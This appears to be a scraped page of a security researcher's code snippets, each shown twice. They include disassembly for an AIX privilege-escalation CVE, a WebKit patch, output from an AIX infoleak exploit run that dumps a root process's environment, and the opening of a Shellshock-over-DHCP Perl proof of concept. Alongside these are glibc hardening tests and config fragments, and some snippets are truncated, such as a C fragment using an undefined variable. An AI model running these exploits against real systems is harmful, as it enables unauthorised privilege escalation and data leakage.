Tim Brown timb-machine

## CVE-2014-8904 AIX lquerylv EoP
.text:10000354                 .using unk_30000BB4, %r31
.text:10000354                 stw     %r3, 0x110+var_28(%sp)
.text:10000358                 addi    %r3, %r31, 0x48C # a_dbgcmd_lquery # "_DBGCMD_LQUERYLV"
.text:1000035C                 bl      .getenv
.text:10000360                 lwz     %rtoc, 0x110+saved_toc(%sp)
.text:10000364                 lwz     %r29, off_30001568 # dword_300015E4
.text:10000368                 .using dword_300015E4, %r29
.text:10000368                 cmpwi   %r3, 0
.text:1000036C                 bne     loc_100006D0

## CVE-2010-4577 & CVE-2010-0046 WebKit type confusion
CVE-2010-4577

Red Hat - https://bugs.webkit.org/show_bug.cgi?id=49883 / http://trac.webkit.org/changeset/72685

Bug report inaccessible but changeset:

CSSParserValueList* args = val->function->args.get();
3632	3632	            if (args && args->size() == 1) {
3633	 	                if (equalIgnoringCase(val->function->name, "local(") && !expectComma) {
 	3633	                if (equalIgnoringCase(val->function->name, "local(") && !expectComma && (args->current()->unit == CSSPrimitiveValue::CSS_STRING || args->current()->unit == CSSPrimitiveValue::CSS_IDENT)) {

## AIX infoleak
$ id
uid=208(tmb) gid=1(staff)
$ ./sploit 1000000 -1
maxiumumleak: 1000000
target: 17760424
$031097N 04j0a06000000000I404d0Qa109&gt;f086f0801(0000:/05d01005=9dfff0xf6f00deh0000/usr/java5/binLC_ALL=CLC__FASTMSG=trueLOGNAME=rootLOCPATH=/usr/lib/nls/locODMPATH=/etc/objrepos:LDR_CNTRL=MAXDATA=0x80000000USER=rootAUTHSTATE=compatSHELL=/usr/bin/kshODMDIR=/etc/objreposHOME=/TERM=dumbPWD=/TZ=GMT0BSTNLSPATH=/usr/lib/nls/msg/%L/%N:/usr/lib/nls/msg/%L/%N.catLIBPATH=/usr/java14/jre/bin:/usr/java14/jre/bin/classic:/usr/java5/jre/bin:/usr/java5/jre/bin/classic:

## no-unqualified-linker-paths.diff.txt example 2
$ LD_LIBRARY_PATH=unqualified:/qualified: SLEEP=0 ../glibc-2.19/build-tree/amd64-libc/elf/ld.so ./test-dlopen-LD_LIBRARY_PATH
     10030:	[+] operating on non setuid binary
     10030:	[+] being opened via LD_LIBRARY_PATH
     10030:	[+] not marked insecure=unqualified/
     10030:	[+] not fully qualified, marking insecure=unqualified/ (via LD_LIBRARY_PATH)
     10030:	[+] operating on non setuid binary
     10030:	[+] being opened via LD_LIBRARY_PATH
     10030:	[+] not marked insecure=unqualified/
     10030:	[+] not fully qualified, marking insecure=unqualified/ (via LD_LIBRARY_PATH)
     10030:	[+] operating on non setuid binary

## no-unqualified-linker-paths.diff.txt example
$ LD_LIBRARY_PATH=/test ../glibc-2.19/build-tree/amd64-libc/elf/ld.so ./test-dlopen-LD_LIBRARY_PATH
$ LD_LIBRARY_PATH=test ../glibc-2.19/build-tree/amd64-libc/elf/ld.so ./test-dlopen-LD_LIBRARY_PATH
     19635:       not fully qualified, marking insecure=test/
     19635:       not fully qualified, marking insecure=test/
     19635:       not fully qualified, marking insecure=test/
     19635:       not fully qualified, marking insecure=test/

## Shellshock RCE over DHCP
#!/usr/bin/perl
# largely purloined from http://www.perlmonks.org/?node_id=1093916 as my PoC for the old options overflow proved too messy^wPerlish to rework - [machine]

use strict;

use IO::Socket;
use Net::DHCP::Packet;
use Net::DHCP::Constants;

my $serveripaddress = "10.10.10.1";

## BB10 accessible via usb0 on 169.254.x.x
+   usb0 IPv6 Invoke_AD4E4603568803A4                       _bp2p._tcp           local
+   usb0 IPv6 Friendly_F034C06D29A99B20_0AB96FC3A2E87129    _bp2p._tcp           local
+   usb0 IPv4 Invoke_AD4E4603568803A4                       _bp2p._tcp           local
+   usb0 IPv4 Friendly_F034C06D29A99B20_0AB96FC3A2E87129    _bp2p._tcp           local
+   usb0 IPv6 24EF7DCD11803ADA9573A4E61C4C02                _tunnel._tcp         local
+   usb0 IPv4 24EF7DCD11803ADA9573A4E61C4C02                _tunnel._tcp         local

## Hardening Sendmail cipher suites
Taken from http://www.michaelm.info/blog/?p=1256:

LOCAL_CONFIG
O ServerSSLOptions=+SSL_OP_NO_SSLv2 +SSL_OP_NO_SSLv3 +SSL_OP_CIPHER_SERVER_PREFERENCE
O ClientSSLOptions=+SSL_OP_NO_SSLv2 +SSL_OP_NO_SSLv3 +SSL_OP_CIPHER_SERVER_PREFERENCE
O CipherList=EDH+CAMELLIA:EDH+aRSA:EECDH+aRSA+AESGCM:EECDH+aRSA+SHA384:EECDH+aRSA+SHA256:EECDH:+CAMELLIA256:+AES256:+CAMELLIA128:+AES128:+SSLv3:!aNULL:!eNULL:!LOW:!3DES:!MD5:!EXP:!PSK:!DSS:!RC4:!SEED:!ECDSA:CAMELLIA256-SHA:AES256-SHA:CAMELLIA128-SHA:AES128-SHA

## Patching a VMDK file
#include <sys/stat.h>
#include <fcntl.h>
#include <sys/mman.h>
#include <stdio.h>

int main(int argc, char **argv) {
        int filehandle;
        char *mmapbuffer;
        filehandle = open("sarpedon-000002.vmdk", O_RDWR);
        mmapbuffer = mmap(0, 4096, PROT_READ | PROT_WRITE, MAP_SHARED, f, 0);

## Google Compute Engine
...
description: Computer
     product: Google Compute Engine ()
     vendor: Google
     serial: GoogleCloud-<hex>
     width: 64 bits
     capabilities: smbios-2.4 dmi-2.4 vsyscall32
     configuration: boot=normal uuid=<uuid>
...
   *-core
	.text:10000354 .using unk_30000BB4, %r31
	.text:10000354 stw %r3, 0x110+var_28(%sp)
	.text:10000358 addi %r3, %r31, 0x48C # a_dbgcmd_lquery # "_DBGCMD_LQUERYLV"
	.text:1000035C bl .getenv
	.text:10000360 lwz %rtoc, 0x110+saved_toc(%sp)
	.text:10000364 lwz %r29, off_30001568 # dword_300015E4
	.text:10000368 .using dword_300015E4, %r29
	.text:10000368 cmpwi %r3, 0
	.text:1000036C bne loc_100006D0
	CVE-2010-4577

	Red Hat - https://bugs.webkit.org/show_bug.cgi?id=49883 / http://trac.webkit.org/changeset/72685

	Bug report inaccessible but changeset:

	CSSParserValueList* args = val->function->args.get();
	3632 3632 if (args && args->size() == 1) {
	3633 if (equalIgnoringCase(val->function->name, "local(") && !expectComma) {
	3633 if (equalIgnoringCase(val->function->name, "local(") && !expectComma && (args->current()->unit == CSSPrimitiveValue::CSS_STRING \|\| args->current()->unit == CSSPrimitiveValue::CSS_IDENT)) {
	$ id
	uid=208(tmb) gid=1(staff)
	$ ./sploit 1000000 -1
	maxiumumleak: 1000000
	target: 17760424
	$031097N 04j0a06000000000I404d0Qa109>f086f0801(0000:/05d01005=9dfff0xf6f00deh0000/usr/java5/binLC_ALL=CLC__FASTMSG=trueLOGNAME=rootLOCPATH=/usr/lib/nls/locODMPATH=/etc/objrepos:LDR_CNTRL=MAXDATA=0x80000000USER=rootAUTHSTATE=compatSHELL=/usr/bin/kshODMDIR=/etc/objreposHOME=/TERM=dumbPWD=/TZ=GMT0BSTNLSPATH=/usr/lib/nls/msg/%L/%N:/usr/lib/nls/msg/%L/%N.catLIBPATH=/usr/java14/jre/bin:/usr/java14/jre/bin/classic:/usr/java5/jre/bin:/usr/java5/jre/bin/classic:
	$ LD_LIBRARY_PATH=unqualified:/qualified: SLEEP=0 ../glibc-2.19/build-tree/amd64-libc/elf/ld.so ./test-dlopen-LD_LIBRARY_PATH
	10030: [+] operating on non setuid binary
	10030: [+] being opened via LD_LIBRARY_PATH
	10030: [+] not marked insecure=unqualified/
	10030: [+] not fully qualified, marking insecure=unqualified/ (via LD_LIBRARY_PATH)
	10030: [+] operating on non setuid binary
	10030: [+] being opened via LD_LIBRARY_PATH
	10030: [+] not marked insecure=unqualified/
	10030: [+] not fully qualified, marking insecure=unqualified/ (via LD_LIBRARY_PATH)
	10030: [+] operating on non setuid binary
	$ LD_LIBRARY_PATH=/test ../glibc-2.19/build-tree/amd64-libc/elf/ld.so ./test-dlopen-LD_LIBRARY_PATH
	$ LD_LIBRARY_PATH=test ../glibc-2.19/build-tree/amd64-libc/elf/ld.so ./test-dlopen-LD_LIBRARY_PATH
	19635: not fully qualified, marking insecure=test/
	19635: not fully qualified, marking insecure=test/
	19635: not fully qualified, marking insecure=test/
	19635: not fully qualified, marking insecure=test/
	#!/usr/bin/perl
	# largely purloined from http://www.perlmonks.org/?node_id=1093916 as my PoC for the old options overflow proved too messy^wPerlish to rework - [machine]

	use strict;

	use IO::Socket;
	use Net::DHCP::Packet;
	use Net::DHCP::Constants;

	my $serveripaddress = "10.10.10.1";
	+ usb0 IPv6 Invoke_AD4E4603568803A4 _bp2p._tcp local
	+ usb0 IPv6 Friendly_F034C06D29A99B20_0AB96FC3A2E87129 _bp2p._tcp local
	+ usb0 IPv4 Invoke_AD4E4603568803A4 _bp2p._tcp local
	+ usb0 IPv4 Friendly_F034C06D29A99B20_0AB96FC3A2E87129 _bp2p._tcp local
	+ usb0 IPv6 24EF7DCD11803ADA9573A4E61C4C02 _tunnel._tcp local
	+ usb0 IPv4 24EF7DCD11803ADA9573A4E61C4C02 _tunnel._tcp local
	Taken from http://www.michaelm.info/blog/?p=1256:

	LOCAL_CONFIG
	O ServerSSLOptions=+SSL_OP_NO_SSLv2 +SSL_OP_NO_SSLv3 +SSL_OP_CIPHER_SERVER_PREFERENCE
	O ClientSSLOptions=+SSL_OP_NO_SSLv2 +SSL_OP_NO_SSLv3 +SSL_OP_CIPHER_SERVER_PREFERENCE
	O CipherList=EDH+CAMELLIA:EDH+aRSA:EECDH+aRSA+AESGCM:EECDH+aRSA+SHA384:EECDH+aRSA+SHA256:EECDH:+CAMELLIA256:+AES256:+CAMELLIA128:+AES128:+SSLv3:!aNULL:!eNULL:!LOW:!3DES:!MD5:!EXP:!PSK:!DSS:!RC4:!SEED:!ECDSA:CAMELLIA256-SHA:AES256-SHA:CAMELLIA128-SHA:AES128-SHA
	#include <sys/stat.h>
	#include <fcntl.h>
	#include <sys/mman.h>
	#include <stdio.h>

	int main(int argc, char **argv) {
	int filehandle;
	char *mmapbuffer;
	filehandle = open("sarpedon-000002.vmdk", O_RDWR);
	mmapbuffer = mmap(0, 4096, PROT_READ \| PROT_WRITE, MAP_SHARED, f, 0);
	...
	description: Computer
	product: Google Compute Engine ()
	vendor: Google
	serial: GoogleCloud-<hex>
	width: 64 bits
	capabilities: smbios-2.4 dmi-2.4 vsyscall32
	configuration: boot=normal uuid=<uuid>
	...
	*-core